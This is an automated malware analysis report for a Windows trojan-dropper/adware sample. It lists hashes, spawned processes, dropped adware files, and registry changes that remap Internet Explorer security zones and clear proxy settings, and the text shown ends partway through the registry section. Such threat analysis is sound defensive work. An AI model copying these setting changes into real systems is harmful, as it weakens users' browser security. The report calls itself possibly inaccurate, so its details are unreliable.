Gen.Variant.Adware.MPlug.51_52eea08e05

by malwarelabrobot on July 2nd, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.bjapvx (Kaspersky), Gen:Variant.Adware.MPlug.51 (B) (Emsisoft), Gen:Variant.Adware.MPlug.51 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Backdoor, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 52eea08e054915129f2638d8012a38f6
SHA1: 2f798b0d3b656556e4d8932e7d0e2251ae541429
SHA256: 1c12146ea5115bb93a53344ebbdbe69ef42eff99e6e97c7eb39f29786d1c122a
SSDeep: 6144:HOMWpa2kA0PIfIyF7D1eUuKg6EizR3iT7:HloX8IfIW1eUh9ESsP
Size: 234496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-10-25 08:28:59
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1304
%original file name%.exe:996
%original file name%.exe:592
%original file name%.exe:1936
%original file name%.exe:440
NybbleCrawler.xyz.exe:356
rundll32.exe:1256
regsvr32.exe:2008
regsvr32.exe:1784
hpds_setup.exe:164

The Trojan injects its code into the following process(es):

rundll32.exe:1016

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
%WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1.ini (0 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\8.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1_1.ini (0 bytes)

The process %original file name%.exe:996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca (0 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70 (0 bytes)

The process %original file name%.exe:592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2 (0 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af (0 bytes)

The process %original file name%.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
%Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\0903733f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e (0 bytes)

The process %original file name%.exe:440 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1993275e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca (0 bytes)

The process NybbleCrawler.xyz.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (0 bytes)

Registry activity

The process %original file name%.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\79458114e3582eab]
"(Default)" = "inFHyxdfrqw4GcBCDWIpJp8qt5Hd57Gs5m8wkosDKDXTr426U5La6BI6Dq7kK2DlONq2NazNPHYy9pelh2ZT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\alpha_installer]
"rc" = "1"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\alpha_installer]
"fi" = "0"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\alpha_installer]
"du" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\alpha_installer]
"cr" = "13080200161088"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 EB 36 33 B2 53 8D 6A DF 46 E6 1E 29 46 1D 87"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"

"NoRepair" = "1"
"ProductName" = "bestadblocker"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "bestadblocker"
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

